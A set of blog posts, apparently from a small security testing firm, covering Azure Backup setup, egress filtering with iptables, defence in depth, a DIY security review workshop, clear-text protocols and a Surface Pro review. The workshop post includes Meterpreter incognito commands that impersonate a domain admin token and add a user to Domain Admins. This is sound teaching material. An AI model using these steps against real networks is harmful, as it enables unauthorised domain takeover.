Windows Azure Backup

I just configured the preview version of Windows Azure Backup.  It is very nice looking and easy to use once you get it up and running - but the instructions to install it are difficult to find and a bit patchy.

First you have to create a certificate for your vault.  You use a utility called makecert.exe, which is part of the Windows SDK (the link in the documentation to TechNet doesn't work - so you can get it here):

http://msdn.microsoft.com/en-US/windows/desktop/aa904949

For reasons that are not clear to me the utility doesn't seem to be available as a standalone download - but installing just the tools portion of the SDK will get you it.

Then the documentation that actually works is here (there are several wrong versions in different places dotted across their sites).

http://msdn.microsoft.com/en-us/library/windowsazure/dn169036.aspx

The key thing is to follow the instructions exactly - you need both the .cer file and the .pfx file (the public and private keys).
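For reference, the certificate creation step boils down to a single makecert command.  The exact parameters (the subject name, expiry date and so on) should be taken from the documentation linked above - the values below are just placeholders to show the shape of it:

  REM placeholder certificate name and expiry date - use the values from the documentation
  makecert.exe -r -pe -n CN=AzureBackupVault -ss my -sr localmachine -eku 1.3.6.1.5.5.7.3.2 -len 2048 -e 01/01/2016 AzureBackupVault.cer

That creates a self-signed certificate with an exportable private key in the Local Computer store and writes out the .cer file; the .pfx (the private key) can then be exported from the certificate store.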

Once you have followed all the instructions and configured your vault you can go ahead with the local software install.  If you have had the Beta version of the agent installed, you need to uninstall it and then install the new one.  Once the software is installed and the agent started, you can then register your server - this took a few minutes to do on my machine - so be patient with it.

Once all this is done - configuring your backups and restores is a snip.  I hope that the documentation will have been improved a bit by the time it comes out of preview.


Your Framework Will Fail You - Part 2 - Network Controls

This post is part of a series based on a presentation I did for the Scottish Ruby Conference in May 2013 (part 1 here).  The talk was around defence in depth and some of the controls companies should be looking at to help protect themselves when something goes wrong.

The first segment to cover is Firewalling.  Network firewalls get quite a bit of flak in the security world, mainly because people tend to rely too heavily on them for protection without really understanding where they are and are not useful.

The "low-risk" setup option that I covered is around the use of egress filtering on firewalls.

One of the main limitations that I see in practical firewall deployments is that they don't take a "default deny" position for all interfaces.  In the typical Internet-facing firewall setup almost everyone will have a default deny rule from the untrusted network (e.g. the Internet) to the more trusted network (e.g. an internal network), but in many cases the other direction (from internal to Internet) will have a default allow rule set up.

Setting a default deny on connections from trusted-->untrusted networks can be a really useful control in making an attacker's life more difficult and hindering their post-exploitation activities.  So in an e-commerce environment it might be possible to have rules on the firewall that restrict all servers from initiating any connections to the Internet except to a couple of hosts for package updates.  This means that someone who has access to the server and who tries to connect to any other system on the Internet will get blocked.
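As a rough illustration of the idea, here is what that might look like as host-level iptables rules on a Linux server (the same logic applies to rules on a perimeter firewall - the resolver and update mirror addresses here are made up):

  # Default deny for all outbound connections
  iptables -P OUTPUT DROP
  # Allow loopback traffic and replies to connections that are already established
  iptables -A OUTPUT -o lo -j ACCEPT
  iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
  # Permit DNS lookups to the internal resolver only (example address)
  iptables -A OUTPUT -d 10.0.0.53 -p udp --dport 53 -j ACCEPT
  # Permit outbound HTTP/HTTPS only to the package update mirror (example address)
  iptables -A OUTPUT -d 192.0.2.10 -p tcp -m multiport --dports 80,443 -j ACCEPT

Everything else from the server towards the Internet simply gets dropped, which is exactly the behaviour that frustrates the reverse shell scenario described in the next paragraph.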

If you consider an attack on a web application, once the attacker has compromised a server (e.g. via SQL injection or command injection), one of the first things they might try to do is make a connection back to a system under their control to download more tools and to establish a shell connection to the compromised system.  With egress filtering in place this becomes considerably trickier to pull off.

If you do intend to do this, I would recommend putting it in place when you're designing the network.  Retro-fitting more restrictive firewall rules can be quite difficult, as things like periodic connections that only happen once a month might not be noticed, leading to unexpected failures after the firewall rules have been put in place.

The "high-risk" setup option looks at the area of network segregation.  One of the setups I've seen quite commonly is that only one firewall is used, with all Internet-facing systems in a single DMZ and then potentially all back-end systems either on the internal network or perhaps in another single DMZ network.  It's a setup I call the "warm smarty" approach to security: crunchy on the outside but soft and gooey once you get past the shell.

The problem with this approach is that once an attacker has compromised a single server it's much easier for them to attack other systems in the environment and expand their access. The reality is that most internal networks are pretty easy for a dedicated attacker to compromise as there's always some system that doesn't get patched somewhere, so once they're in, it's pretty much game over.

Addressing this isn't cheap or easy, but effective network segmentation can make attackers' lives much more difficult.

There are a variety of approaches that can be used for network segmentation.  One is to segment individual Internet-facing applications so that each is in its own DMZ.  This can reduce the risk of onward compromise, although it does depend on the firewall ruleset being suitably restrictive.

This approach will obviously increase management costs, for example by requiring more management servers and potentially allowing less automation of maintenance, so there is a trade-off between the desired level of security and the cost involved.  But it's something that should be considered rather than just going for the default single-firewall approach.

Scottish Ruby Conference Talk - Your Framework Will Fail You

I was presenting yesterday at the Scottish Ruby Conference, and given that the talk is relatively high-level as it covers a lot of ground, I thought it would be a good idea to do a series of blog posts to provide some more details and resources (link to the presentation here).

The title of my talk was "Your framework will fail you".  I had the idea for it when some of the security bugs in Rails came up earlier in the year, which led me to think some more about defence in depth.  Anyone in security will know this as one of those things we think is a good idea but which can be a bit of a hard sell, as when someone pays for a security control (e.g. Anti-Virus, a Firewall) it can be tricky to say "yep, that will fail sometimes, so we need to buy some other things as well".

However if anything has been proven by the increase in public vulnerabilities, exploits and compromises, it is that all security controls fail and you will be well served by having a fall-back control or detective control to notice when the main one has failed.

The way I structured the presentation was in two halves.  The first looks at the important topics of threat modelling (e.g. who's going to attack you) and a bit about why defence in depth is important.  After that it looks at various layers of a solution and talks about controls for a low-risk/budget scenario and a high-risk/budget one.  The focus of the low-risk option was to look at controls which can be put in easily/cheaply.  They may not be super-effective all the time, but they have their uses.  On the high-risk end I looked at things which can provide more protection but will take more resource to manage; alternatively, in some cases it's the same control as the low-risk version but with more time dedicated to managing it (e.g. a lot of the detective controls are only really good if well managed).

The blog posts will be coming out every other day or so looking at the solution layers and hopefully I'll get to the end of the series without interruption :)

"Performing a DIY Security Review" Workshop at BSides London

We had a great time doing our workshop at BSides London recently.  In fact we had a great time in general - the conference was lots of fun.

This was the first long(ish) workshop I had ever prepared for a conference, and I was surprised at how much work was involved in it (compared to an ordinary presentation).  We not only had to create the presentation, but build the infrastructure, create Kali builds on USB sticks, set up the demos, prepare a worksheet for the participants and prepare the two 'test reports' I had promised in the description of the workshop.  Then we had to test, test, test in an attempt to appease the dark god of demos!

We were coming down from Scotland to London for the event and quickly discovered a major drawback - we had a lot of kit....   We needed two PC laptops to be the Nessus servers and host the VMs for the demos.  We also had a Surface Pro for running the demo, a Surface RT (just for kicks) and a MacBook Air to run Rory's presentation.  Add in a switch and cables (because we didn't like the idea of trying to run eight sets of Nessus scans over wireless), plus a four-way extension and sundry printed materials for the participants, and we had three huge rucksacks full of stuff.  Going down the stairs at the station I was scared I was going to tip over backwards.

Anyway, after a brief panic when we thought the five hundred bottle openers we had ordered for the conference swag bags had not turned up, we found them and then got set up.  We were a bit nervous that after all the effort, no one would be interested.  When I checked the subscription sheet, we had ten signups for eight slots (the room was on the small side).  And then people started to turn up - and there were loads more than on the sheet.  Unfortunately, we did not have room to let everyone participate in the demos, but we managed to fit everyone (16 people!) into the room, although it was a bit on the hot and crowded side.

So the purpose of the workshop was to show people who were technical, but not professional testers, how to prepare for a review by eliminating all easily correctable faults in advance of the test.  This would enable the tester to focus on serious issues rather than finding and documenting things such as missing patches and SSLv2.  The example given was of the imaginary UWC company - and we showed off two mock reports: a 'before' with 58 vulnerabilities and an 'after' with 6.  The 'sting' was supposed to be that amongst the six was a critical SQL vulnerability which the tester had not had time to investigate in the first scenario, but found in the second.
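As an aside, spotting that kind of easily correctable issue doesn't need expensive tooling.  Checking a web server for legacy SSL support, for example, is a one-liner with nmap's ssl-enum-ciphers script (the hostname below is just a placeholder, and this isn't necessarily the exact command we used in the workshop):

  # List the SSL/TLS protocol versions and ciphers the server will accept (www.example.com is a placeholder)
  nmap --script ssl-enum-ciphers -p 443 www.example.com

If SSLv2 or other weak configurations show up in the output, that's something you can fix before the tester ever arrives.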

We did four demos: nmap, Nessus, and two Metasploit scenarios.  The second Metasploit demo was the classic which really impressed me when I started testing - using an unpatched workstation to steal an Admin's token and use it to add a user to the Domain Admins group on a fully patched DC.  The dark god did not really visit us - and everyone seemed to get on well.
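For anyone curious about that last demo, the token-stealing technique runs roughly along the lines below from a Meterpreter session on the unpatched workstation.  This is a sketch of the general approach rather than our exact demo script, and the domain, usernames and DC address are all made up:

  (the domain, account names and DC IP below are placeholders)
  meterpreter > load incognito
  meterpreter > list_tokens -u
  meterpreter > impersonate_token "CORP\\domainadmin"
  meterpreter > add_user testuser Password123 -h 10.0.0.10
  meterpreter > add_group_user "Domain Admins" testuser -h 10.0.0.10

The incognito extension lists the delegation tokens left behind by logged-on users, impersonates the domain admin's token, and then uses it to create a user and add them to Domain Admins on the DC - all without ever touching the DC's patch level.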

We hope everyone enjoyed the workshop and thank you for coming.  Hopefully we will be able to reuse the materials in the future.

I've attached our presentation. Conducting a DIY Security Review - latest


Can't we do better than "We use SSL"?

I was reading the security page for another new product today and it struck me how amazingly disappointed I am that we're still at the stage where the best that companies can say about their security is "Trust us, we hold all your data securely, and we use military grade SSL" or words to that effect.

Not to say that SSL isn't a good way of protecting data in transit, but this is the equivalent of someone building a bank and saying "trust us, this is secure, we use the same rivets as they do in battleships".

It's ridiculous to expect users to be able to make an informed decision about security with the amount of data provided.

So what would be a better option?  Well, if you're developing a product, how about publishing some information about the security steps in your development process (you do have those, right?).

Some examples:

  • We provide all our developers with secure development training (for optional bonus, here are the areas we covered and how we assessed our developers' awareness of security topics)
  • All our products have threat modelling and security architecture reviews (for optional bonus, here's the output of our threat model and what controls we put in place)
  • We have external consultants complete a security-focused code review before release (for optional bonus, here's the report and what we did to address the findings)
  • We complete security testing on all our products (for optional bonus, here's the report and what we did to address the findings)

Now, this is far from a comprehensive list and doesn't address the problem of how to ensure it's all true, but surely it's better than just SSL!

B-Sides Pentest Automation Talk

We were at B-Sides London yesterday.  It all went really well and there was a great turnout.  The new venue was good as well.  We didn't get to see too many of the talks, unfortunately, as we were delivering a workshop in the morning and I had my talk in the afternoon.

As with most of the talks I do, I find the questions the most interesting piece, as you get feedback on what problems other people have had with the topic at hand and also new ideas for developing the presentation.

Some of the conversations I had after my talk centered around choosing a licence for code that you release.  It's an important area to consider if you're releasing your own code, as you should always put some form of licence up there so people know how they can and cannot use your code.  My feeling for most of the scripts I do is that a GPL-based licence is the best option, as it encourages other people who want to use your code to contribute back to the community.

Another point on licensing that was brought up is the flip side: you should always check the licence of code that you make use of, to ensure that you're within the terms specified.

My presentation is up on the Prezi site here.  Most of the code, along with the other scripts I've released, is on GitHub here.  I'll add the cookie grabber script up there over the next day or two.

Three Lines

We've decided that the results/recommendations coming out of most of the Internal Security Reviews we do can be summarised in three lines.

a)  Patch everything.  Not just Windows - everything.

b)  Change default credentials.  Don't leave your main router with creds of admin/admin.

c)  Get rid of clear text protocols.  Ditch telnet for SSH and ftp for sftp (a quick check for these is sketched below).
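As an example of that check, a sweep for the usual suspects with nmap will find most of them (the address range below is just an example):

  # Show only hosts with ftp or telnet listening (example address range)
  nmap -p 21,23 --open 10.0.0.0/24

If anything comes back, that's a box that needs SSH/SFTP instead.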

It doesn't require ninjas, red teams or zero-days to compromise most organisations, given access to their internal networks.  In fact, why bother with anything fancy when the most basic of techniques uncover such glaring faults?


Tools of the trade - USB powered Switches

As a bit of a tech geek I have a tendency to pick up a variety of pieces of hardware and software to see if they'll be useful on tests.  One of my more successful purchases has been a USB-powered Ethernet switch that handles PoE pass-through and has a couple of mirrored ports.  It's pretty compact, so it goes easily in a bag for on-site jobs, and it can be useful in a number of scenarios:

  • Lack of Ethernet ports on-site.  I've had this on more than one occasion: you get to site and there are no free ports, so a switch and a couple of patch cables can be very handy.
  • Monitoring thick client apps.  Not all apps are particularly proxy friendly, so having an easy way to see all the traffic on the switch is very handy (see the capture sketch after this list).
  • VOIP assessments.  A standard part of VOIP assessments is looking at the traffic between the phone and the management servers, so having something that supports PoE pass-through is handy, as that's how most VOIP phones are powered.
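On the thick client point, the usual approach is to plug a laptop into one of the mirrored ports and capture everything for later analysis.  A minimal sketch with tcpdump (the interface name and output file are just examples):

  # Capture full packets from the mirror port into a pcap for analysis in Wireshark (example interface and filename)
  tcpdump -i eth0 -s 0 -w thick-client.pcap

From there you can dig through the capture to see exactly what the application is sending over the wire.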

All in all, if you're a tester I'd recommend getting something like this.  The one I've got is the Dualcomm DCGS-2005L, although I'm sure there are others that fit the bill.

Workshop at BSides London

As well as Rory's talk on pentest automation at BSides London, we will both be doing a workshop, "Performing a DIY Security Review".  It is aimed at IT professionals and shows the basics of how to prepare for a security review ("pentest").  This is something that is dear to our hearts, because writing about SSLv2 over and over again is not something which either excites us greatly or provides a great deal of value to customers.  We think people should do a preparatory review themselves and let the tester concentrate on the specialized stuff - giving better value for money and a shorter, more focused report.

http://www.securitybsides.org.uk/workshops.html

So the workshop is all about using free or low cost tools to look at a network and remove glaring faults from it prior to having a test done.  We don't cover web application testing - but if this one proves of interest we may do something along those lines in the future.

I'll post the slides and documentation here after the event.


Review of Surface Pro

I just got my Surface Pro a few days ago – albeit I had to import it from the US with the help of a friend over there.  I’ve not had it for long so these are initial impressions I will add to later, but so far I am very pleased with it and think it is going to greatly appeal to businesses over here when it is released in the UK (I hope Microsoft are reading this….).

As I mentioned in an earlier posting, I have been using Windows 8 on touch devices since it came out, first on an Iconia W500 tablet I upgraded from Win 7 myself, then RT on the Surface since Sept 2012 – so this is really a comparison between the Surface Pro and what has gone before.

Hardware

The first thing you notice when you are an RT user and take the Pro out of the box is that it is a fair bit heavier and thicker than the earlier device.  I suspect, however, that you would not realize this if you hadn’t been a heavy user of the other one.  It weighs in at 900 grams, which is just enough more than the 680 grams of the Surface RT (or the 662g of the iPad 3) to make you feel the difference.  So as a tablet it is on the heavy side, but by no means unusably so, and I suspect that after a while I won’t notice the difference very much.  It is 1.3cm thick compared to 0.94cm for the iPad 3 and the Surface RT – but I don’t really find that much of a downside.

Because it has an Intel Core i5 CPU rather than the relatively low-powered ARM processor in other tablet devices, it runs relatively hot and has to have internal fans.  In the time I have been using it I have yet to hear the fans come on and it is effectively completely silent.  The vent for the fans is a slim line along the top of the tablet which I would never have noticed if I hadn’t been actively looking for it (this is most of the reason for the extra thickness of the device).  The Pro also feels very slightly warm on the back of the case, which the RT does not (although it is my understanding that the iPad 3 gets warm as well).  This is in comparison with the Iconia I had until last year, where the fans were on almost constantly and you could use the case as a hot water bottle (I’m not knocking the Iconia btw – it was a nice machine for its time – but it shows how quickly technology advances).

The general build of the tablet is very nice indeed and shows the same attention to detail as on the RT model, with the kickstand being a particularly important and well-designed feature considering that this is a productivity machine that is going to be used in laptop mode a lot.  The screen on the RT was nice enough, but the one on the Pro is absolutely lovely – very high resolution and fantastic colour depth.  It has great port specifications for a tablet, with a full-sized USB 3 port (as against the USB 2 on the RT), a micro SD slot and a mini DisplayPort which can be used to plug it in to a VGA or HDMI device.  For anyone sad enough to have both tablets – the two expensive video cables I bought for the RT are not compatible with the Pro, although it is compatible with any standard mini DisplayPort adapter (apparently with some of them you have to pare a bit of plastic off the cable to allow for the bevel on the Surface’s port).  I now have it running a 24” monitor and a Mimo USB mini monitor and very nice it looks with them.

[Photo: the Surface Pro driving the external monitors]

As far as disk space is concerned, there has been a lot of MS bashing around the Surface and inadequate disk space.  I think this is nonsense as far as the 128GB model is concerned.  Out of the box I had 84GB free before I installed anything else, and I could have increased this by moving the recovery partition to a USB stick.  Considering that the 128GB model is only marginally more expensive than the 64GB, I am not sure I would recommend the latter, and this has been borne out by sales of both models, where the 128GB has been regularly out of stock.

The stylus/pen that comes with the Pro is brilliant.  Night and day between that and trying to write on the handwriting recognition keyboard with your finger or a standard stylus.

Battery life was another issue that came up before the Surface Pro was released, and I think this time MS were a little too eager to be honest in their announcements, to the extent of under-rating the device.  I reckon that yesterday I got about five and a half hours of moderate use (web browsing, Office, music, a few videos) out of it.  At that point it was not completely exhausted (but I was) so I put it on charge before it ran out.  I think it might get six hours if you pushed it, and that could be rated as poor compared with premium tablets, but good for an Ultrabook.  It does not have the ‘always on’ feature of ARM tablets where the screen is immediately available when you pull the keyboard back.  Instead it is more like a standard tablet ‘waking up’, where you touch the power button and it takes about five seconds to resume.

As I said in my review of the Surface RT, I am not very keen on the proprietary power adaptor, which is not easy to connect to the tablet and seems a bit loose when it does connect.  I’m also not convinced that attaching the stylus to the power connector when not in use is a good idea, because the stylus then has nowhere to attach while the device is charging.

So, in case I sound negative about the Pro compared to the RT (which I didn’t mean to be), here is the really big advantage it has, which to my mind is pretty much the deciding factor for professionals…

Software

I’ve worked with Windows RT, including (tut tut) the jail-broken version, for some time now and I really like it.  For MUI apps it runs brilliantly; it is fine for Office Home (which is included with the tablet).  As a general leisure device (browsing, music, books, video) and for occasional business use with Office and a web browser, it is absolutely great.  Additionally it can participate in homegroups with other Windows PCs and use Windows utilities like the snipping tool, Explorer, Task Manager etc.  I am not a typical home user – but my 73-year-old mother is – and for her it does everything her laptop did and more, in a much smaller form factor and with a much better battery life.  An iPad would just not have done the trick for her because she is a long-time Windows user with a need for access to the file system, the ability to access shares on file servers etc (without having to jump through hoops to do so).

Strangely, it was not until I jail-broke mine and tried to use it in my professional capacity as a tester that I came across limitations with the RT version which I hadn’t even thought about, but which made me realize how much I need and value the full version of Windows.

Availability of applications.  Professional people and power users need specific applications, and these are not generally ones they can choose on the basis of what is available in a company store or select themselves.  They are predetermined by the company they work for, and let’s face it, unless the company is part of the small minority which use Linux or Macs – they are going to be Windows applications.  I think the respective stores for Microsoft, Apple and Google are getting there and may possibly replace desktop applications for many functions, but I don’t think the vast body of professional software which has been built up for Windows is going anywhere in a hurry.  In my professional capacity I have many applications I need which simply only run on the full version of Windows.

Performance.  The ARM processor in the RT Surface runs the applications designed for it very nicely.  It is only when you jail-break it and try other stuff that you realize why MS did not allow it: a lot of them run pretty slowly and drain the battery badly.

The huge advantage of the Surface Pro is that it is a proper Windows 8 Pro PC which will run every Windows 7 or 8 compatible application out of the box – in practice most applications written for PCs in the last 10+ years.  I have a Windows Experience Index on the Pro of 5.61, which beats my 18-month-old desktop by a decent distance.

Manageability

Probably most end users and standard geeks won’t care much about this – but having been involved in Corporate IT in a largely Microsoft environment for many years – I think I can say that many Sys Admins will.  The Surface Pro is a standard Windows PC which can be managed like any other through Active Directory and Group Policy.  It has all the security and granularity built up over the last twenty years; it can join a domain; it needs no special software installed on it and doesn’t require IT Teams to install special software on servers or jump through any hoops to get it working or make it comply with internal policy.   To my mind, this is the killer feature that will make IT departments want to run with this device rather than iPads or Androids.

In Conclusion

This week I will be trying the Surface Pro out in earnest by running it as my primary PC for an external test.  So far it seems to be very fast and I have no real doubts that it can easily complete the task.

But actually – what is this device?  It is not quite a tablet, because it is not as light as an iPad and doesn’t have the same battery stats.  It isn’t even really an Ultrabook, because the form factor and display are not as good as some of the high-end devices available from OEMs like Sony.  So maybe it needs a brand new name which would suit it and show it off to its best advantage.  Perhaps an Ultratablet?  I’m not sure it could be sold this way, but something along the lines of ‘Surface – 95% of the best tablet and 95% of the best laptop experience’.

Anyway – I think both Surfaces are really great.  If I were asked which one you should get then ideally I would say ‘both’.  Here is a picture of mine sitting next to each other.

[Photo: the Surface Pro and the Surface RT side by side]